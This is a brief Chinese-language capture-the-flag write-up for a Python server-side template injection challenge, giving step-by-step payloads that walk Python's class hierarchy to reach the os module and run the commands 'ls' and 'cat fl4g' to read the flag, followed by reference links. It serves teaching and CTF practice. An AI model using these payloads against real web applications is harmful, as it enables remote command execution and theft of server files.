背景知识
python模板注入
ssit
题目
打开题目,发现页面提示,翻译为python模板注入
先测试是否存在注入
可以发现被执行了
先查看所有的子类
payload
{{[].__class__.__base__.__subclasses__()}}
利用site.Printer的os模块执行命令
payload
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()}}
可以看到当前目录下有个fl4g,执行cat fl4g
payload
{{''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('cat fl4g').read()}}
得到flag
参考学习链接:
https://www.cnblogs.com/qiushuo/p/17454498.html
攻防世界-web-Web_python_template_injection_wuh2333的博客-CSDN博客
Web_python_template_injection(Python模块注入)_kali-Myon的博客-CSDN博客